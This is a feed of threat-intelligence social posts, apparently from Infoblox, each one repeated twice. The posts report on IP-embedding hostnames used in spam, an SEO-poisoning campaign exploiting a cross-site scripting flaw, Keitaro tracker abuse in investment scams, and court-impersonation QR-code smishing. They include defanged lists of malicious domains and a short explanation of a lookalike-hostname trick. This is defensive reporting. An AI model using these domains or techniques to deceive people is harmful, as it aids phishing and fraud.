  51. Seeing FQDNs like "mtmoqiuq.20.218.142.124.static.hostiran[.]name" and "sgrwnbid.172-202-98-170.cloud-xip[.]com", we first thought some ASNs could be exploited similarly to the ".ARPA abuse" we described in one of our recent blogs. Turns out we were overthinking it... This kind of "DNS abuse" is so straight forward... We're not sure it qualifies as DNS abuse...

    Here is what is going on: Whatever IP address you prepend to "static.hostiran[.]name" creates a hostname which resolves to this IP... That is it! Same goes for cloud-xip[.]com!

    We've seen these kinds of hostnames a lot in SPAM emails recently, like the one we screenshot below which loads an image from a CDN as a giant hyperlink. We aren't sure why malicious SPAM actors bother to use this trick in their email links... If they control an IP, they can use it directly in URLs. They don't need a domain name!? And it isn't like this bypasses a firewall... If their IP is blocked, queries to those FQDNs will be too...

    Our best guesses are that:
    - Using hostnames rather than IPs helps them bypass SPAM email detection?
    - And / or it enables them to create "subdomains", which they seem to be doing to track something, either SPAM campaigns, or their victims.

    Technically, this could be used to create lookalike FQDNs. Those examples look like random subdomains, but literally anything can be prepended to the IP, so the only limit is your imagination! Not the most convincing lookalike by any means... but we've seen worse!

    Here is an example of how this can be abused to both, load content from literally any IP, and create low quality lookalikes:
    urlscan.io/result/019d1b3d-b94

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #scam

  52. Seeing FQDNs like "mtmoqiuq.20.218.142.124.static.hostiran[.]name" and "sgrwnbid.172-202-98-170.cloud-xip[.]com", we first thought some ASNs could be exploited similarly to the ".ARPA abuse" we described in one of our recent blogs. Turns out we were overthinking it... This kind of "DNS abuse" is so straight forward... We're not sure it qualifies as DNS abuse...

    Here is what is going on: Whatever IP address you prepend to "static.hostiran[.]name" creates a hostname which resolves to this IP... That is it! Same goes for cloud-xip[.]com!

    We've seen these kinds of hostnames a lot in SPAM emails recently, like the one we screenshot below which loads an image from a CDN as a giant hyperlink. We aren't sure why malicious SPAM actors bother to use this trick in their email links... If they control an IP, they can use it directly in URLs. They don't need a domain name!? And it isn't like this bypasses a firewall... If their IP is blocked, queries to those FQDNs will be too...

    Our best guesses are that:
    - Using hostnames rather than IPs helps them bypass SPAM email detection?
    - And / or it enables them to create "subdomains", which they seem to be doing to track something, either SPAM campaigns, or their victims.

    Technically, this could be used to create lookalike FQDNs. Those examples look like random subdomains, but literally anything can be prepended to the IP, so the only limit is your imagination! Not the most convincing lookalike by any means... but we've seen worse!

    Here is an example of how this can be abused to both, load content from literally any IP, and create low quality lookalikes:
    urlscan.io/result/019d1b3d-b94

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #scam

  53. Dios mio! While researching a particular type of Colombian folk music, we stumbled across a .edu domain selling... accordions? Our first thought was potentially domain hijacking, but it appears to be more likely an exploitation of CVE-2026-27210 (TLDR; cross-site scripting). While the vulnerability has been patched in the plugin itself, not all pages have updated their plugins, and search engines have already indexed the poisoned pages! Pivoting led to 50+ additional domains found spread across three risky TLDs: .sbs, .pics, and .shop. The domains on .sbs and .pics appear to be config servers to exploit the vulnerability; the domains on .shop are the landing pages where victims can be scammed.

    IOCs:
    000o[.]sbs,0pen[.]sbs,123buys[.]shop,123me[.]shop,1bg[.]pics,1ki[.]pics,1mage[.]sbs,1ql[.]pics,1ty[.]pics,1vi[.]pics,1wr[.]pics,2ty[.]pics,569oagri[.]shop,66buys[.]shop,6ip[.]pics,6ym[.]pics,7rt[.]pics,8pi[.]pics,99buys[.]shop,99i[.]pics,9gwe[.]shop,a25n[.]shop,bk2[.]pics,bk59t[.]shop,buysok[.]shop,c68k[.]shop,cc1[.]pics,doo[.]pics,ep7[.]pics,estore-1[.]com,g9gvv[.]sbs,gaer896[.]shop,gm5[.]pics,gosok[.]shop,gt3[.]pics,h66p[.]shop,hh6[.]pics,iilvw[.]sbs,im9[.]pics,img1[.]sbs,in6[.]pics,jj3[.]pics,kk9[.]pics,lilil[.]sbs,llvvw[.]sbs,m66p6[.]shop,mebuys[.]shop,mg6[.]pics,mh8f6k[.]shop,mkk[.]pics,ms1[.]pics,nn6[.]pics,onsgs[.]com,p6[.]pics,p888p[.]shop,pan1[.]top,pic1[.]sbs,pic2[.]sbs,pt11[.]sbs,py3y[.]com,qq1[.]pics,rey89p[.]shop,shop56[.]shop,t88t8[.]shop,tp1[.]pics,tp9[.]pics,trues[.]sbs,up9[.]pics,upimg[.]sbs,uu2[.]pics,vt5[.]pics,vteyu[.]shop,vvf1[.]sbs,vvp1[.]sbs,w2w[.]pics,w88p[.]shop,wp59q[.]shop,wvlll[.]sbs,wvv1[.]sbs,wvvvv[.]sbs,x2p[.]pics,xyaer548[.]shop,yi1[.]pics

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #seo_poisoning #seopoisoning

  54. Dios mio! While researching a particular type of Colombian folk music, we stumbled across a .edu domain selling... accordions? Our first thought was potentially domain hijacking, but it appears to be more likely an exploitation of CVE-2026-27210 (TLDR; cross-site scripting). While the vulnerability has been patched in the plugin itself, not all pages have updated their plugins, and search engines have already indexed the poisoned pages! Pivoting led to 50+ additional domains found spread across three risky TLDs: .sbs, .pics, and .shop. The domains on .sbs and .pics appear to be config servers to exploit the vulnerability; the domains on .shop are the landing pages where victims can be scammed.

    IOCs:
    000o[.]sbs,0pen[.]sbs,123buys[.]shop,123me[.]shop,1bg[.]pics,1ki[.]pics,1mage[.]sbs,1ql[.]pics,1ty[.]pics,1vi[.]pics,1wr[.]pics,2ty[.]pics,569oagri[.]shop,66buys[.]shop,6ip[.]pics,6ym[.]pics,7rt[.]pics,8pi[.]pics,99buys[.]shop,99i[.]pics,9gwe[.]shop,a25n[.]shop,bk2[.]pics,bk59t[.]shop,buysok[.]shop,c68k[.]shop,cc1[.]pics,doo[.]pics,ep7[.]pics,estore-1[.]com,g9gvv[.]sbs,gaer896[.]shop,gm5[.]pics,gosok[.]shop,gt3[.]pics,h66p[.]shop,hh6[.]pics,iilvw[.]sbs,im9[.]pics,img1[.]sbs,in6[.]pics,jj3[.]pics,kk9[.]pics,lilil[.]sbs,llvvw[.]sbs,m66p6[.]shop,mebuys[.]shop,mg6[.]pics,mh8f6k[.]shop,mkk[.]pics,ms1[.]pics,nn6[.]pics,onsgs[.]com,p6[.]pics,p888p[.]shop,pan1[.]top,pic1[.]sbs,pic2[.]sbs,pt11[.]sbs,py3y[.]com,qq1[.]pics,rey89p[.]shop,shop56[.]shop,t88t8[.]shop,tp1[.]pics,tp9[.]pics,trues[.]sbs,up9[.]pics,upimg[.]sbs,uu2[.]pics,vt5[.]pics,vteyu[.]shop,vvf1[.]sbs,vvp1[.]sbs,w2w[.]pics,w88p[.]shop,wp59q[.]shop,wvlll[.]sbs,wvv1[.]sbs,wvvvv[.]sbs,x2p[.]pics,xyaer548[.]shop,yi1[.]pics

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #seo_poisoning #seopoisoning

  55. Keitaro Tracker im Missbrauch: Wie Cyberkriminelle KI-Investmentbetrug im großen Stil betreiben

    IT-Sicherheitsexperten von Infoblox und Confiant haben über vier Monate hinweg systematisch dokumentiert, in welchem Ausmaß der kommerzielle Werbetracker Keitaro für kriminelle Zwecke zweckentfremdet wird.

    all-about-security.de/keitaro-

    #cybersecurity #infoblox #ki #ai #cloacking #domainsecurity

  56. Keitaro Tracker im Missbrauch: Wie Cyberkriminelle KI-Investmentbetrug im großen Stil betreiben

    IT-Sicherheitsexperten von Infoblox und Confiant haben über vier Monate hinweg systematisch dokumentiert, in welchem Ausmaß der kommerzielle Werbetracker Keitaro für kriminelle Zwecke zweckentfremdet wird.

    all-about-security.de/keitaro-

    #cybersecurity #infoblox #ki #ai #cloacking #domainsecurity

  57. 🔴 A threat isn't much of a threat if it can't reach the right victims. 📦 That's why many modern threat actors rely on cloakers and traffic distribution systems (TDS) to target, route, and hide at scale. In a six‑month joint effort analyzing four months of data with Confiant, we identified 15,500 domains configured to Keitaro instances and actively used in cyber campaigns. Keitaro is a legitimate ad tracker, but it is frequently misused by cybercriminals as an all‑in‑one tracker + TDS + cloaker in scam and malware campaigns. We encounter Keitaro in our investigations nearly every day, and we set out to quantify that abuse in the broader landscape. We're publishing a three‑part series to share what we learned. Part 1 focuses on a subset of actors who leverage AI in their operations, most of whom are tied to investment scams. At the end of the report, you'll find a link to our github repository that contains thousands of related Keitaro iocs.

    infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising

  58. 🔴 A threat isn't much of a threat if it can't reach the right victims. 📦 That's why many modern threat actors rely on cloakers and traffic distribution systems (TDS) to target, route, and hide at scale. In a six‑month joint effort analyzing four months of data with Confiant, we identified 15,500 domains configured to Keitaro instances and actively used in cyber campaigns. Keitaro is a legitimate ad tracker, but it is frequently misused by cybercriminals as an all‑in‑one tracker + TDS + cloaker in scam and malware campaigns. We encounter Keitaro in our investigations nearly every day, and we set out to quantify that abuse in the broader landscape. We're publishing a three‑part series to share what we learned. Part 1 focuses on a subset of actors who leverage AI in their operations, most of whom are tied to investment scams. At the end of the report, you'll find a link to our github repository that contains thousands of related Keitaro iocs.

    infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising

  59. 📱Smishing Slows, Quishing Quickens 🎣

    Sick of smishing and those pesky parking/toll texts? Don’t get caught by crafty, counterfeit court QR codes — it’s a scan-and-scam! 💳 🚨

    North American cell phone users are being hit with yet another wave of smishing campaigns that now include quishing elements. Likely orchestrated by Chinese-speaking threat actors, this latest campaign builds on previous vehicular violations, evolving tactics while impersonating US courts. 🧑‍⚖️

    We’ve recently seen a flurry of SMS messages pushing parking violations — but with a twist: face justice in court… or scan and pay instead!

    Delivered as an official-looking image, the actor has begun integrating QR codes into these lures to help mask suspicious phishing URLs, baiting victims into entering personal information, credentials, and ultimately making payments.

    For some, this lure may sound better than facing justice for their perceived poor parking. Victims who don't comply are warned that failure to appear or pay could have serious repercussions - a scare tactic designed to push you toward a hasty decision and scanning the QR code! 🫣

    We uncovered thousands of these nefarious domains, through their use of Registered Domain Generation Algorithms (RDGAs) and local government impersonation, hosted across a diverse range of hosting providers to evade takedown.

    Recent examples:
    ⛔ ahfgx[.]icu
    ⛔ euoyq[.]icu
    ⛔ htpze[.]icu
    ⛔ mwlaj[.]icu

    Friendly reminder - courts don't usually communicate with you via text. That said, we suspect this actor will continue to evolve, expanding their global reach and diversifying lures while improving tradecraft used in smishing and quishing delivery. As for us, we'll take our chances on evading that bench warrant and running from the law. 🏃‍♂️‍➡️

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #smishing #quishing

  60. 📱Smishing Slows, Quishing Quickens 🎣

    Sick of smishing and those pesky parking/toll texts? Don’t get caught by crafty, counterfeit court QR codes — it’s a scan-and-scam! 💳 🚨

    North American cell phone users are being hit with yet another wave of smishing campaigns that now include quishing elements. Likely orchestrated by Chinese-speaking threat actors, this latest campaign builds on previous vehicular violations, evolving tactics while impersonating US courts. 🧑‍⚖️

    We’ve recently seen a flurry of SMS messages pushing parking violations — but with a twist: face justice in court… or scan and pay instead!

    Delivered as an official-looking image, the actor has begun integrating QR codes into these lures to help mask suspicious phishing URLs, baiting victims into entering personal information, credentials, and ultimately making payments.

    For some, this lure may sound better than facing justice for their perceived poor parking. Victims who don't comply are warned that failure to appear or pay could have serious repercussions - a scare tactic designed to push you toward a hasty decision and scanning the QR code! 🫣

    We uncovered thousands of these nefarious domains, through their use of Registered Domain Generation Algorithms (RDGAs) and local government impersonation, hosted across a diverse range of hosting providers to evade takedown.

    Recent examples:
    ⛔ ahfgx[.]icu
    ⛔ euoyq[.]icu
    ⛔ htpze[.]icu
    ⛔ mwlaj[.]icu

    Friendly reminder - courts don't usually communicate with you via text. That said, we suspect this actor will continue to evolve, expanding their global reach and diversifying lures while improving tradecraft used in smishing and quishing delivery. As for us, we'll take our chances on evading that bench warrant and running from the law. 🏃‍♂️‍➡️

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #smishing #quishing